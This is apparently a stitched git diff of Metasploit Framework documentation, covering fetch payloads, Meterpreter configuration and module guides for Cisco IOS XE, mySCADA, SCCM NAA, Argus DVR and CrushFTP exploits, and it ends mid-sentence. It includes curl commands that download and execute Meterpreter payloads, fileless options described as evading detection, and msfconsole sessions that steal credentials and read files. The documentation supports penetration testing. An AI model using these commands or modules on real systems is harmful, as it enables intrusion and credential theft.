 Building dependency tree
 Reading state information... Done
@@ -117,7 +110,7 @@ Setting up libgmp-dev:amd64 (2:5.0.5+dfsg-2) ...
 Build and install the gem

 ```
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# make
 ruby -w setup.rb config
 setup.rb:280: warning: assigned but unused variable - vname
 setup.rb:280: warning: assigned but unused variable - desc
@@ -130,12 +123,12 @@ setup.rb:280: warning: assigned but unused variable - default2
 <--- lib
 ---> ext
 ---> ext/oci8
-/opt/metasploit/ruby/bin/ruby /root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8/extconf.rb
+/opt/metasploit/ruby/bin/ruby /root/ruby-oci8-ruby-oci8-2.2.14/ext/oci8/extconf.rb
 checking for load library path...
  LD_LIBRARY_PATH...
    checking /opt/metasploit/ruby/lib... no
-    checking /opt/oracle/instantclient_12_2... yes
-  /opt/oracle/instantclient_12_2/libclntsh.so.12.1 looks like an instant client.
+    checking /opt/oracle/instantclient_23_6... yes
+  /opt/oracle/instantclient_23_6/libclntsh.so.12.1 looks like an instant client.
 checking for cc... ok
 checking for gcc... yes
 checking for LP64... yes
@@ -144,11 +137,11 @@ checking for ruby header... ok
 checking for OCIInitialize() in oci.h... yes
 [...]
 linking shared-object oci8lib_250.so
-make[1]: Leaving directory `/root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8'
+make[1]: Leaving directory `/root/ruby-oci8-ruby-oci8-2.2.14/ext/oci8'
 <--- ext/oci8
 <--- ext

-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make install
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# make install
 ruby -w setup.rb install
 setup.rb:280: warning: assigned but unused variable - vname
 setup.rb:280: warning: assigned but unused variable - desc
@@ -158,5 +151,5 @@ mkdir -p /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
 install oci8.rb /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
 [...]
 <--- ext
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7#
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14#
 ```
@@ -86,8 +86,7 @@ OptSomething.new(option_name, [boolean, description, value, *enums*], aliases: *
  options](#Filtering-datastore-options) section for more information.
 * **fallbacks** *optional*, *key-word only* An array of names that will be used as a fallback if the main option name is
  defined by the user. This is useful in the scenario of wanting specialised option names such as `SMBUser`, but to also
-  support gracefully checking a list of more generic fallbacks option names such as `Username`. This functionality is 
-  currently behind a feature flag, set with `features set datastore_fallbacks true` in msfconsole
+  support gracefully checking a list of more generic fallbacks option names such as `Username`.

 Now let's talk about what classes are available:

@@ -24,7 +24,7 @@ cURL, or Certutil.

 ## Organization
 Unlike Command Stagers which are organized by binary, Fetch Payloads are organized by server. Currently, we support
-HTTP, HTTPS, and TFTP servers.  Once you select a fetch payload, you can select the binary you'd like to run on the
+HTTP, HTTPS, SMB, and TFTP servers.  Once you select a fetch payload, you can select the binary you'd like to run on the
 remote host to download the served payload prior to execution.

 Here is the naming convention for fetch payloads:
@@ -69,15 +69,36 @@ msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) >
 `FETCH_COMMAND` is the binary we wish to run on the remote host to download the adapted payload.  Currently, the
 supported options are `CURL FTP TFTP TNFTP WGET` on Linux hosts and `CURL TFTP CERTUTIL` on Windows hosts.  We'll get
 into more details on the binaries later.
-`FETCH_FILENAME` is the name you'd like the executable payload saved as on the remote host.  This option is not
-supported by every binary and must end in `.exe` on Windows hosts.  The default value is random.
+
 `FETCH_SRVHOST` is the IP where the server will listen.
+
 `FETCH_SRVPORT` is the port where the server will listen.
+
 `FETCH_URIPATH` is the URI corresponding to the payload file.  The default value is deterministic based on the
 underlying payload so a payload created in msfvenom will match a listener started in Framework assuming the underlying
 served payload is the same.
+
+### Dependent Options
+`FETCH_FILELESS` is an option that specifies a method to modify the fetch command to download the binary payload to
+memory rather than disk before execution, thus avoiding some HIDS and making forensics harder.  Currently, there are
+two options: `bash` and `python3.8+`.  Both of these require the target to be running Linux Kernel 3.17 or above.
+This option is only available when the platform is Linux.
+
+`FETCH_FILENAME` is the name you'd like the executable payload saved as on the remote host.  This option is not
+supported by every binary and must end in `.exe` on Windows hosts.  The default value is random.
+This option is only available when `FETCH_FILELESS` is set to `none`
+
+`FETCH_PIPE` is a binary flag that will create a second resource containing the original fetch command to run and then
+will produce a much shorter command to run on the host that will download the original fetch command and pipe it
+directly to the target's shell.  Use this option if there is a limit on the command size as it will result in a much
+smaller original command.  When set to true, the `FETCH_URIPATH` option is used for the pipe command resource uri and
+the default `FETCH_URIPATH`value is used for the original binary payload uri.
+This option is only available when the fetch  transport is HTTP or HTTPS and the payload platform is Linux with the 
+`FETCH_COMMAND` set to `CURL` or `WGET` or the platform is Windows and the `FETCH_COMMAND` is `CURL`
+
 `FETCH_WRITABLE_DIR` is the directory on the remote host where we'd like to store the served payload prior to execution.
-This value is not supported by all binaries.  If you set this value and it is not supported, it will generate an error.
+This value is not supported by all fetch binaries.  If you set this value and it is not supported, it will generate an error.
+This option is only available when `FETCH_FILELESS` is set to `none`

 The remaining options will be the options available to you in the served payload; in this case our served payload is
 `linux/x64/meterpreter/reverse_tcp` so our only added options are `LHOST` and `LPORT`.  If we had selected a different
@@ -154,6 +175,20 @@ really odd situation where you can execute commands, you can get a session in fr
 a payload manually.  Just follow the steps above, and run the provided command.  Right now, the only thing we serve are
 Framework payloads, but in the future, expanding to serve and execute any executable binary would be relatively trivial.

+## Fetch Pipe
+If space is at a premium, you can use the `FETCH_PIPE` option.  When using `FETCH_PIPE`, the fetch server hosts two
+resources: the original binary and then the generated fetch command.  In the place of the original command, the command
+generated will be a much smaller command to download the original command and pipe it into the shell.
+The following example shows both the original command to download and execute the binary and the command to pipe the
+original fetch command directly to the shell.  Since this requires two downloads, it is less stealthy, but the
+command to run on the target is significantly shorter.
+``` msf
+msf6 payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > to_handler
+[*] Command served: curl -so %TEMP%\DpRdBIfeyax.exe http://10.5.135.117:8080/zw3LGTh9FtaLJ4bCQRAWdw & start /B %TEMP%\DpRdBIfeyax.exe
+
+[*] Command to run on remote host: curl -s http://10.5.135.117:8080/test|cmd
+```
+
 ## Using it in an exploit
 Using Fetch Payloads is no different than using any other command payload.  First, give users access to the Fetch
 payloads for a given platform by adding a target that supports `ARCH_CMD` and the desired platform, either `windows` or
@@ -34,6 +34,13 @@ use auxiliary/gather/ldap_query
 run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
 ```

+Alternatively, the URI syntax can be used:
+
+```
+use auxiliary/gather/ldap_query
+run ldap://domain.local;Administrator:p4$$w0rd@192.168.123.13/dc=domain,dc=local action=ENUM_ACCOUNTS
+```
+
 Example output:

 ```msf
@@ -124,6 +124,8 @@ The following protocols are currently supported, and described in more detail be
 - file - Load a series of RHOST values separated by newlines from a file. This file can also include URI strings
 - http
 - https
+- ldap
+- ldaps
 - mysql
 - postgres
 - smb
@@ -118,9 +118,9 @@ The values that are common to both `HTTP(S)` and `TCP` transports are:
    * `tcp://:<port>` - indicates that this payload is a _bind_ payload listening on the specified port (note that no host is specified).
    * `http://<host>:<port>/<uri>` - indicates that this payload is an HTTP connection (can only be _reverse_).
    * `https://<host>:<port>/<uri>` - indicates that this payload is an HTTPS connection (can only be _reverse_).
-* **Communications expiry** - This value is another 32-bit DWORD value that represents the number of seconds to wait between successful packet/receive calls. For more information, please read the **Timeout documentation** (link coming soon).
-* **Retry total** - This value is 32-bit DWORD value that represents the number of seconds that Meterpreter should continue to attempt to reconnect on this transport before giving up. For more information, please read the **Timeout documentation** (link coming soon).
-* **Retry wait** - This value is 32-bit DWORD value that represents the number of seconds between each attempt that Meterpreter makes to reconnect on this transport. For more information, please read the **Timeout documentation** (link coming soon).
+* **Communications expiry** - This value is another 32-bit DWORD value that represents the number of seconds to wait between successful packet/receive calls. For more information, please read the [[Timeout Control|./Meterpreter-Timeout-Control.md]] documentation.
+* **Retry total** - This value is 32-bit DWORD value that represents the number of seconds that Meterpreter should continue to attempt to reconnect on this transport before giving up. For more information, please read the [[Timeout Control|./Meterpreter-Timeout-Control.md]] documentation.
+* **Retry wait** - This value is 32-bit DWORD value that represents the number of seconds between each attempt that Meterpreter makes to reconnect on this transport. For more information, please read the [[Timeout Control|./Meterpreter-Timeout-Control.md]] documentation.

 The layout of this block in memory looks like the following:

@@ -159,8 +159,8 @@ At this time, there are no `TCP`-specific configuration values, as the common co
    * `http://<proxy ip>:<proxy port>` in the case of `HTTP` proxies.
    * `socks=<socks ip>:<sock port>` in the case of `socks` proxies.
 * **Proxy user name** - Some proxies require authentication. In such cases, this value contains the username that should be used to authenticate with the given proxy. This field is `64` characters in size (`wchar_t`).
-* Proxy password - This value will accompany the user name field in the case where proxy authentication is required. It contains the password used to authenticate with the proxy and is also `64` characters in size (`wchar_t`).
-*** User agent string** - Customisable user agent string. This changes the user agent that is used when `HTTP/S` requests are made to Metasploit. This field is `256` characters in size (`wchar_t`).
+* **Proxy password** - This value will accompany the user name field in the case where proxy authentication is required. It contains the password used to authenticate with the proxy and is also `64` characters in size (`wchar_t`).
+* **User agent string** - Customisable user agent string. This changes the user agent that is used when `HTTP/S` requests are made to Metasploit. This field is `256` characters in size (`wchar_t`).
 * **Expected SSL certificate hash** - Meterpreter has the capability of validating the SSL certificate that Metasploit presents when using `HTTPS`. This value contains the `20`-byte SHA1 hash of the expected certificate. For more information, please read the **SSL certificate validation documentation** (link coming soon).

 All values that are shown above need to be specified in the configuration, including SSL certificate validation for plain `HTTP` connections. Values that are not used should be zeroed out.
@@ -207,7 +207,7 @@ As already mentioned, more than one of these transport configuration blocks can

 ### Extension configuration block

-The extension configuration block is designed to allow Meterpreter payloads to contain any extra extensions that the user wants to bundle in. The goal is to provide the ability to have **Stageless payloads** (link coming soon), and to provide the means for sharing of extensions during migration (though this hasn't been implemented yet). Each of the extensions must have been compiled with [Reflective DLL Injection](https://github.com/rapid7/ReflectiveDLLInjection/) support, as this is the mechanism that is used to load the extensions when Meterpreter starts. For more information on this facility, please see the **Stageless payloads** (link coming soon) documentation.
+The extension configuration block is designed to allow Meterpreter payloads to contain any extra extensions that the user wants to bundle in. The goal is to provide the ability to have [[Stageless payloads|./Meterpreter-Stageless-Mode.md]], and to provide the means for sharing of extensions during migration (though this hasn't been implemented yet). Each of the extensions must have been compiled with [Reflective DLL Injection](https://github.com/rapid7/ReflectiveDLLInjection/) support, as this is the mechanism that is used to load the extensions when Meterpreter starts. For more information on this facility, please see the [[Stageless payloads|./Meterpreter-Stageless-Mode.md]] documentation.

 The extension configuration block also functions as a "list" to allow for an arbitrary number of extensions to be included. Each extension entry needs to contain:

@@ -0,0 +1,41 @@
+Payloads for Metasploit Framework can now be tested when opening pull requests. This is handled by GitHub actions within 
+our CI, this workflow will build the payloads using the appropriate repositories and branches. It will then run our 
+acceptance tests against those changes. This requires adding GitHub labels for each corresponding payload repository. 
+The labels will contain the `payload-testing` prefix, each supporting testing for an external repository:
+ - `payload-testing-branch` ([https://github.com/rapid7/metasploit-payloads/](https://github.com/rapid7/metasploit-payloads/))
+ - `payload-testing-mettle-branch` ([https://github.com/rapid7/mettle/](https://github.com/rapid7/mettle/))
+
+**_Note_**:
+
+The long term aim is supporting workflow dispatches for this job, but that is currently not working as expected. So as a
+work-around we will need to edit the workflow locally. Once the testing has been completed ensure the following locally 
+changes are reverted before merging.
+
+Once the appropriate repository label is added, you will need to edit the GitHub workflow to point at the specific 
+repository and branch you want to test. Below I will outline some changes that are required to make this work, update 
+the following lines like so:
+
+1. Point at your forked repository - [line to update](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L189):
+```yaml
+repository: foo-r7/metasploit-framework
+```
+
+2. Point at your forked repository branch - [line to update](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L191):
+```yaml
+ref: fixes-all-the-bugs
+```
+
+3. Point at your forked repository that contains the payload changes you'd like to test - update lines [45](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L45) and [250](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L250):
+```yaml
+repository: foo-r7/metasploit-payloads
+```
+
+4. Point at your forked repository branch that contains the payload changes you'd like to test - update lines [47](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L47) and [252](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L252):
+```yaml
+ref: fixes-all-the-payload-bugs
+```
+
+Steps 3 and 4 outline the steps required when steps testing metasploit-payloads. The same steps apply for Mettle, the 
+following lines would need updated:
+ - Point at your forked repository that contain the payload changes you'd like to test - [line](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L156).
+ - Point at your forked repository branch that contains the payload changes you'd like to test - [line](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L158).
@@ -892,7 +892,7 @@ In the following example the AUTO mode is used to issue a certificate for the MS
 authenticated.

 ```msf
-msf6 auxiliary(server/relay/esc8) > set RELAY_TARGETS 172.30.239.85
+msf6 auxiliary(server/relay/esc8) > set RHOSTS 172.30.239.85
 msf6 auxiliary(server/relay/esc8) > run
 [*] Auxiliary module running as background job 1.
 msf6 auxiliary(server/relay/esc8) > 
@@ -856,6 +856,9 @@ NAVIGATION_CONFIG = [
          {
            path: 'Loading-Test-Modules.md'
          },
+          {
+            path: 'Payload-Testing.md'
+          },
          {
            path: 'Measuring-Metasploit-Performance.md'
          }
@@ -34,7 +34,15 @@ The vulnerable IOS XE versions are:
 17.11.99SW

 ## Testing
-This module was tested against IOS XE version 16.12.3. To test this module you will need to either:
+This module was tested against the following IOS XE versions:
+
+| IOS XE Version | Appliance Series |
+|----------------|------------------|
+| 16.12.3        | CSR1000v         |
+| 17.03.02       | CSR1000v         |
+| 17.06.05       | C8000v           |
+
+To test this module you will need to either:

 * Acquire a hardware device running one of the vulnerable firmware versions listed above.

@@ -87,6 +95,7 @@ modes are `user`, `privileged`, and `global`.

 ## Scenarios

+### IOS XE 16.12.03 (CSR1000v)
 ```
 msf6 > use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198
 msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set RHOST 192.168.86.57
@@ -169,4 +178,85 @@ msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run CMD="show
 *15:24:05.110 UTC Fri Nov 3 2023
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > 
+```
+
+### IOS XE 17.06.05 (C8000v)
+
+```
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > show options 
+
+Module options (auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   CMD      show version     yes       The CLI command to execute.
+   MODE     privileged       yes       The mode to execute the CLI command in, valid values are 'user', 'privileged', or 'global'.
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.86.108   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run
+[*] Running module against 192.168.86.108
+
+Cisco IOS XE Software, Version 17.06.05
+Cisco IOS Software [Bengaluru], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 17.6.5, RELEASE SOFTWARE (fc2)
+Technical Support: http://www.cisco.com/techsupport
+Copyright (c) 1986-2023 by Cisco Systems, Inc.
+Compiled Wed 25-Jan-23 16:07 by mcpre
+Cisco IOS-XE software, Copyright (c) 2005-2023 by cisco Systems, Inc.
+All rights reserved.  Certain components of Cisco IOS-XE software are
+licensed under the GNU General Public License ("GPL") Version 2.0.  The
+software code licensed under GPL Version 2.0 is free software that comes
+with ABSOLUTELY NO WARRANTY.  You can redistribute and/or modify such
+GPL code under the terms of GPL Version 2.0.  For more details, see the
+documentation or "License Notice" file accompanying the IOS-XE software,
+or the applicable URL provided on the flyer accompanying the IOS-XE
+software.
+ROM: IOS-XE ROMMON
+test_c800v uptime is 1 hour, 43 minutes
+Uptime for this control processor is 1 hour, 44 minutes
+System returned to ROM by reload
+System image file is "bootflash:packages.conf"
+Last reload reason: reload
+This product contains cryptographic features and is subject to United
+States and local country laws governing import, export, transfer and
+use. Delivery of Cisco cryptographic products does not imply
+third-party authority to import, export, distribute or use encryption.
+Importers, exporters, distributors and users are responsible for
+compliance with U.S. and local country laws. By using this product you
+agree to comply with applicable laws and regulations. If you are unable
+to comply with U.S. and local laws, return this product immediately.
+A summary of U.S. laws governing Cisco cryptographic products may be found at:
+http://www.cisco.com/wwl/export/crypto/tool/stqrg.html
+If you require further assistance please contact us by sending email to
+export@cisco.com.
+License Level: 
+License Type: Perpetual
+Next reload license Level: 
+Addon License Level: 
+Addon License Type: Subscription
+Next reload addon license Level: 
+The current throughput level is 10000 kbps 
+Smart Licensing Status: Registration Not Applicable/Not Applicable
+cisco C8000V (VXE) processor (revision VXE) with 2027875K/3075K bytes of memory.
+Processor board ID 9VM6T5CQNTE
+Router operating mode: Autonomous
+3 Gigabit Ethernet interfaces
+32768K bytes of non-volatile configuration memory.
+3965316K bytes of physical memory.
+11526144K bytes of virtual hard disk at bootflash:.
+Configuration register is 0x2102
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run CMD="show clock"
+[*] Running module against 192.168.86.108
+
+*17:36:50.722 UTC Mon Mar 3 2025
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > 
 ```
@@ -31,6 +31,9 @@ The vulnerable IOS XE versions are:
 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
 17.11.99SW

+NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even
+though the IOS XE version indicates they should be vulnerable to CVE-2023-20273.
+
 ## Testing
 This module was tested against IOS XE version 16.12.3. To test this module you will need to either:

@@ -0,0 +1,64 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits two vulnerabilities (CVE-2025-24865 & CVE-2025-22896) in mySCADA MyPRO Manager <= v1.3 to retrieve the configured
+credentials for the mail server.
+
+The administrative web interface has certain features where credentials are required to be accessed, but the implementation is flawed,
+allowing to bypass the requirement. Other important administrative features do not require credentials at all, allowing an unauthenticated
+remote attacker to perform privileged actions. These issues are tracked through CVE-2025-24865.
+Another vulnerability, tracked through CVE-2025-22896, is related to the cleartext storage of various credentials by the application.
+
+One way how these issues can be exploited is to allow an unauthenticated remote attacker to retrieve the cleartext credentials of the mail
+server that is configured by the product, which this module does.
+
+Versions <= 1.3 are affected. CISA published [ICSA-25-044-16](https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-16) to cover
+the security issues.
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor](https://www.myscada.org/mypro/).
+
+**Successfully tested on**
+
+- mySCADA MyPRO Manager 1.3 on Windows 11 (22H2)
+
+## Verification Steps
+
+1. Install the application
+2. After installation, reboot the system and wait some time until a runtime (e.g., 9.2.1) has been fetched and installed.
+3. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/admin/scada/mypro_mgr_creds 
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > set RHOSTS <IP>
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > run 
+```
+
+## Scenarios
+
+Running the module against MyPRO Manager v1.3 on Windows 11, should result in an output similar to the
+following:
+
+```
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > run
+[*] Running module against 192.168.1.78
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[+] Mail server credentials retrieved:
+[+] Host: smtp.example.com
+[+] Port: 993
+[+] Auth Type: login
+[+] User: user
+[+] Password: SuperS3cr3t!
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > creds
+Credentials
+===========
+
+host          origin        service           public  private       realm  private_type  JtR Format  cracked_password
+----          ------        -------           ------  -------       -----  ------------  ----------  ----------------
+192.168.1.78  192.168.1.78  34022/tcp (http)  user    SuperS3cr3t!         Password
+```
@@ -0,0 +1,150 @@
+## NAA Credential Exploitation
+
+The NAA account is used by some SCCM configurations in the policy deployment process. It does not require many privileges, but 
+in practice is often misconfigured to have excessive privileges.
+
+The account can be retrieved in various ways, many requiring local administrative privileges on an existing host. However,
+it can also be requested by an existing computer account, which by default most user accounts are able to create.
+
+
+## Module usage
+The `admin/dcerpc/samr_computer` module is generally used to first create a computer account, which requires no permissions:
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_account`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   a. For the `ADD_COMPUTER` action, if you don't specify `ACCOUNT_NAME` or `ACCOUNT_PASSWORD` - one will be generated automatically
+   b. For the `DELETE_ACCOUNT` action, set the `ACCOUNT_NAME` option
+   c. For the `LOOKUP_ACCOUNT` action, set the `ACCOUNT_NAME` option
+4. Run the module and see that a new machine account was added
+
+Then the `auxiliary/admin/sccm/get_naa_credentials` module can be used:
+
+1. `use auxiliary/admin/sccm/get_naa_credentials`
+2. Set the `RHOST` value to a target domain controller (if LDAP autodiscovery is used)
+3. Set the `USERNAME` and `PASSWORD` information to a domain account
+4. Set the `COMPUTER_USER` and `COMPUTER_PASSWORD` to the values obtained through the `samr_computer` module
+5. Run the module to obtain the NAA credentials, if present.
+
+Alternatively, if the Management Point and Site Code are known, the module can be used without autodiscovery:
+
+1. `use auxiliary/admin/sccm/get_naa_credentials`
+2. Set the `COMPUTER_USER` and `COMPUTER_PASSWORD` to the values obtained through the `samr_computer` module
+3. Set the `MANAGEMENT_POINT` and `SITE_CODE` to the known values.
+4. Run the module to obtain the NAA credentials, if present.
+
+The management point and site code can be retrieved using the `auxiliary/gather/ldap_query` module, using the `ENUM_SCCM_MANAGEMENT_POINTS` action.
+
+See the Scenarios for a more detailed walk through
+
+## Options
+
+### RHOST, USERNAME, PASSWORD, DOMAIN, SESSION, RHOST
+Options used to authenticate to the Domain Controller's LDAP service for SCCM autodiscovery.
+
+### COMPUTER_USER, COMPUTER_PASSWORD
+
+Credentials for a computer account (may be created with the `samr_account` module). If you've retrieved the NTLM hash of
+a computer account, you can use that for COMPUTER_PASSWORD.
+
+### MANAGEMENT_POINT
+The SCCM server.
+
+### SITE_CODE
+The Site Code of the management point.
+
+## Scenarios
+In the following example the user `ssccm.lab\eve` is a low-privilege user.
+
+### Creating computer account
+
+```
+msf6 auxiliary(admin/dcerpc/samr_account) > run rhost=192.168.33.10 domain=sccm.lab username=eve password=iloveyou
+[*] Running module against 192.168.33.10
+
+[*] 192.168.33.10:445 - Adding computer
+[+] 192.168.33.10:445 - Successfully created sccm.lab\DESKTOP-2KVDWNZ3$
+[+] 192.168.33.10:445 -   Password: pJTrvFyDHiHnqtlqTTNYe2HPVpO3Yekj
+[+] 192.168.33.10:445 -   SID:      S-1-5-21-3875312677-2561575051-1173664991-1128
+[*] Auxiliary module execution completed
+```
+
+### Running with Autodiscovery
+Using the credentials just obtained with the `samr_account` module.
+
+```
+msf6 auxiliary(admin/sccm/get_naa_credentials) > options
+
+Module options (auxiliary/admin/sccm/get_naa_credentials):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   COMPUTER_PASS                      yes       The password of the provided computer account
+   COMPUTER_USER                      yes       The username of a computer account
+   MANAGEMENT_POINT                   no        The management point (SCCM server) to use
+   SITE_CODE                          no        The site code to use on the management point
+   SSL               false            no        Enable SSL on the LDAP connection
+   VHOST                              no        HTTP server virtual host
+
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION  1                no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   DOMAIN                     no        The domain to authenticate to
+   PASSWORD                   no        The password to authenticate with
+   RHOSTS                     no        The domain controller (for autodiscovery). Not required if providing a management point and site code
+   RPORT     389              no        The LDAP port of the domain controller (for autodiscovery). Not required if providing a management point and site code (TCP)
+   USERNAME                   no        The username to authenticate with
+
+
+View the full module info with the info, or info -d command.
+msf6 auxiliary(admin/sccm/get_naa_credentials) > run rhost=192.168.33.10 username=eve domain=sccm.lab password=iloveyou computer_user=DESKTOP-2KVDWNZ3$ computer_pass=pJTrvFyDHiHnqtlqTTNYe2HPVpO3Yekj
+[*] Running module against 192.168.33.10
+
+[*] Discovering base DN automatically
+[*] 192.168.33.10:389 Discovered base DN: DC=sccm,DC=lab
+[+] Found Management Point: MECM.sccm.lab (Site code: P01)
+[*] Got SMS ID: BD0DC478-A71A-4348-BD14-B7E91335738E
+[*] Waiting 5 seconds for SCCM DB to update...
+[*] Got NAA Policy URL: http://<mp>/SMS_MP/.sms_pol?{c48754cc-090c-4c56-ba3d-532b5ce5e8a5}.2_00
+[+] Found valid NAA credentials: sccm.lab\sccm-naa:123456789
+[*] Auxiliary module execution completed
+```
+
+### Manual discovery
+
+```
+msf6 auxiliary(gather/ldap_query) > run rhost=192.168.33.10 username=eve domain=sccm.lab password=iloveyou
+[*] Running module against 192.168.33.10
+
+[*] 192.168.33.10:389 Discovered base DN: DC=sccm,DC=lab
+CN=SMS-MP-P01-MECM.SCCM.LAB,CN=System Management,CN=System,DC=sccm,DC=lab
+=========================================================================
+
+ Name           Attributes
+ ----           ----------
+ cn             SMS-MP-P01-MECM.SCCM.LAB
+ dnshostname    MECM.sccm.lab
+ mssmssitecode  P01
+
+[*] Query returned 1 result.
+[*] Auxiliary module execution completed
+
+msf6 auxiliary(gather/ldap_query) > use auxiliary/admin/sccm/get_naa_credentials
+
+msf6 auxiliary(admin/sccm/get_naa_credentials) > run computer_user=DESKTOP-2KVDWNZ3$ computer_pass=pJTrvFyDHiHnqtlqTTNYe2HPVpO3Yekj management_point=MECM.sccm.lab site_code=P01
+
+[*] Got SMS ID: BD0DC478-A71A-4348-BD14-B7E91335738E
+[*] Waiting 5 seconds for SCCM DB to update...
+[*] Got NAA Policy URL: http://<mp>/SMS_MP/.sms_pol?{c48754cc-090c-4c56-ba3d-532b5ce5e8a5}.2_00
+[+] Found valid NAA credentials: sccm.lab\sccm-naa:123456789
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,46 @@
+## Vulnerable Application
+This module leverages an issue with how the `RESULTPAGE` parameter within `WEBACCCOUNT.cgi` handles file referencing and as a result is vulnerable to Local File Inclusion (LFI). 
+
+## Options
+To successfully read contents of the Windows file system you must set the full file path of the file you want to check using `TARGET_FILE` (not including the drive letter prefix). 
+As a first run it is recommended to try leaking `Windows/system.ini` as a validation exercise on your first module run.
+
+## Testing
+To setup a test environment, the following steps can be performed:
+1. Set up a Windows operating system (any OS that has C:\Windows\system.ini)
+2. Download the [Argus DVR 4 Software](https://download.cnet.com/argus-surveillance-dvr/3000-2348_4-10576796.html)
+3. Run the Argus software and a webpage running on port 8080 will appear. Take note of the machine's IP
+4. On your attacker machine follow the verification steps below.
+
+## Verification Steps
+1. start msfconsole
+2. `use auxiliary/gather/argus_dvr4_lfi_cve_2018_15745`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set TARGET_FILE Windows/system.ini`
+5. `run`
+
+## Scenarios
+### Utilising Argus DVR 4 CVE-2018-15745 to Leak DVRParams.ini
+```
+msf6 > use auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745 
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > set RHOSTS 192.168.1.15
+RHOSTS => 192.168.1.15
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > set TARGET_FILE ProgramData/PY_Software/Argus Surveillance DVR/DVRParams.ini
+TARGET_FILE => ProgramData/PY_Software/Argus Surveillance DVR/DVRParams.ini
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > run
+[*] Running module against 192.168.1.15
+[*] Sending request to 192.168.1.15:8080 for file: ProgramData/PY_Software/Argus%20Surveillance%20DVR/DVRParams.ini
+[+] File retrieved successfully!
+[Main]
+ServerName=
+ServerLocation=
+ServerDescription=
+ReadH=0
+UseDialUp=0
+DialUpConName=
+DialUpDisconnectWhenDone=0
+DIALUPUSEDEFAULTS" checked checked
+
+[*] Auxiliary module execution completed
+
+```
@@ -0,0 +1,67 @@
+## Vulnerable Application
+This module leverages an authentication bypass in CrushFTP 11 < 11.3.1 and 10 < 10.8.4. Attackers
+with knowledge of a valid username can provide a crafted S3 authentication header to the CrushFTP web API
+to authenticate as that user without valid credentials. When successfully executed, the exploit will
